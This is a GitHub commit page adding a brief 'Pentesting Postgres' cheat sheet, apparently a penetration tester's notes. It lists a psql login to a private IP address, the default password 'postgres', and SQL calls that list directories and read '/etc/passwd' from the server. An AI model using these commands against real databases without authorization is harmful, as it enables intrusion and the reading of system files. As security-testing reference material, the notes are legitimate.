Skip to content

Commit

Permalink
Create Readme.md
Browse files Browse the repository at this point in the history
  • Loading branch information
rootsecdev authored Aug 31, 2022
1 parent cf60f0f commit e5bd294
Showing 1 changed file with 25 additions and 0 deletions.
25 changes: 25 additions & 0 deletions Tools/Postgres/Readme.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
# Pentesting Postgres

URL Reference: https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql

User Authentication Example:

```
psql -U postgres -p 5437 -h 192.168.208.47
```

Default Passwords:

postgres

Read Directories:

```
pg_ls_dir('./');
```

Read Files:

```
pg_read_file('/etc/passwd');
```

0 comments on commit e5bd294

Please sign in to comment.